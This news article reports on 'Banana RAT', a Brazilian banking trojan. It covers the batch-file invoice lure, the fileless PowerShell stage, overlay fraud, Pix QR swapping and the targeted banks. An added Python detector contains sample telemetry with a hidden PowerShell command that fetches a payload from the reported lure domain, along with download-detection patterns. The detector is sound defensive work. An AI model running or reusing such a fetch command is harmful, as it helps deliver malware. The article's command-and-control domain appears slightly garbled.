A new threat called Banana RAT malware is targeting banking customers in Brazil, using fake documents and tools to compromise devices and steal funds. Cybersecurity experts from TrendAI (formerly Trend Micro) found the operation and shared its details with Hackread.com.
Inside the Attack Pipeline
The scam was still active when TrendAI experts began investigating. They collected data directly from the hackers’ live servers between 17 and 22 April 2026 to fully understand how the scam works.
They found that the attackers speak Brazilian Portuguese, operate under the temporary name SHADOW-WATER-063, and are targeting individuals in Brazil’s business sector to deliver the Banana RAT malware. The hackers’ own code stamps revealed their internal project codename as Projeto Banana.
Further probing revealed that scammers trick victims via WhatsApp or phishing links into downloading a fake electronic invoice file named Consultar_NF-e.bat from the domain convitemundial2026.com. When they click on it, this batch file runs a hidden PowerShell command that fetches a second file called msedge.txt.
From this point the chain is fileless: the main payload runs entirely in the computer’s memory and is not saved to disk. To avoid detection, the malware places the files it does keep in a folder path that imitates a legitimate Microsoft location (C:\ProgramData\Microsoft\Diagnosis\ETW).
On the attacker-controlled servers, the group uses FastAPI crypter, a custom obfuscation tool, to manage the attack. They do not need to send the same file to everyone: the server setup automatically scrambles the code to generate 100 to 200 unique malware versions at once. Because each download is completely different, standard antivirus tools cannot recognise or block the file.
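The delivery chain above (a .bat invoice lure spawning a hidden PowerShell download of a .txt stage, with files dropped under the faked Microsoft Diagnosis\ETW path) can be expressed as endpoint detection logic. The following is an added example written for this article, not code from TrendAI or Hackread; the Sysmon-like events and the `Event`, `detect` and `SAMPLE_EVENTS` names are constructed here, while the file name, domain and folder path come from the report.

```python
import re
from dataclasses import dataclass

# Values taken from the report above; everything else in this block is constructed.
DROP_DIR = r"c:\programdata\microsoft\diagnosis\etw"
LURE_DOMAIN = "convitemundial2026.com"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

@dataclass
class Event:
    kind: str          # "process" (creation) or "file" (write), Sysmon-like
    pid: int
    ppid: int
    image: str
    cmdline: str = ""  # command line for process events
    target: str = ""   # written path for file events

# Constructed sample telemetry mirroring the chain described in the article.
SAMPLE_EVENTS = [
    Event("process", 100, 1, r"C:\Windows\explorer.exe"),
    Event("process", 200, 100, r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c "C:\Users\ana\Downloads\Consultar_NF-e.bat"'),
    Event("process", 300, 200, PS,
          'powershell -w hidden -c "iwr https://convitemundial2026.com/msedge.txt"'),
    Event("file", 300, 200, PS,
          target=r"C:\ProgramData\Microsoft\Diagnosis\ETW\msedge.txt"),
    Event("process", 400, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign
]

HIDDEN_PS = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
FETCH_TXT = re.compile(r"(?:iwr|invoke-webrequest|downloadstring|downloadfile).*\.txt", re.I)

def detect(events):
    """Return (pid, reason) alerts for the Banana RAT delivery chain."""
    procs = {e.pid: e for e in events if e.kind == "process"}
    alerts = []
    for e in events:
        if e.kind == "process" and e.image.lower().endswith("powershell.exe"):
            parent = procs.get(e.ppid)
            from_bat = parent is not None and ".bat" in parent.cmdline.lower()
            if from_bat and HIDDEN_PS.search(e.cmdline) and FETCH_TXT.search(e.cmdline):
                alerts.append((e.pid, "hidden PowerShell spawned by .bat fetching .txt stage"))
            if LURE_DOMAIN in e.cmdline.lower():
                alerts.append((e.pid, f"contact with lure domain {LURE_DOMAIN}"))
        elif e.kind == "file" and e.target.lower().startswith(DROP_DIR):
            alerts.append((e.pid, "write under faked Microsoft Diagnosis\\ETW path"))
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields three alerts, all for the PowerShell process, while the benign `cmd.exe /c dir` chain produces none.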
Stealing Money in Real Time
The operation is built for financial fraud, targeting 16 specific Brazilian banks and crypto exchanges. What makes Banana RAT dangerous is that it gives attackers total control by functioning as a live surveillance and theft tool. With features like screen streaming, the attackers can watch the victim’s desktop, log keystrokes to steal passwords, and use BlockInput to freeze the victim’s mouse and keyboard.
“What makes this case notable is not just the sophistication of the tooling – it is the intent behind it. This is an operation purpose-built to enable real-time financial fraud: intercepting banking sessions, manipulating payment flows, and deceiving victims when they are most vulnerable,” researchers noted in the blog post.
When a victim opens their online bank, the malware uses a Display Overlay Module to pop up a fake full-screen message reading “Mandatory Security Update – DO NOT TURN OFF YOUR COMPUTER”. While the user waits, the attacker makes fraudulent transfers in the background.
The malware also has a feature, built on the ZXing library, that swaps Pix QR codes (Pix is Brazil’s instant-payment system). If a user scans a QR code to pay a bill, the malware alters the payment data so the money goes straight to the scammers.
The malware targets some of Brazil’s largest retail and corporate financial institutions, including:
- Itaú
- Caixa
- Bradesco
- Santander
- Banco do Brasil (BB)
It also targets regional banks like Banrisul and Daycoval, and cooperative networks like Sicoob and Sicredi.
TrendAI is now working with the Federação Brasileira de Bancos (FEBRABAN) to share intelligence and stop the threat. Until the infrastructure is taken down, the researchers recommend that organisations block network access to the primary command-and-control domain, cwindowsk-cdncom, to protect their systems.
Sharing his insights on this discovery with Hackread.com, TrendAI’s VP of AI Security and Threat Research, Tom Kellermann, stated:
“The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000. The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way.”
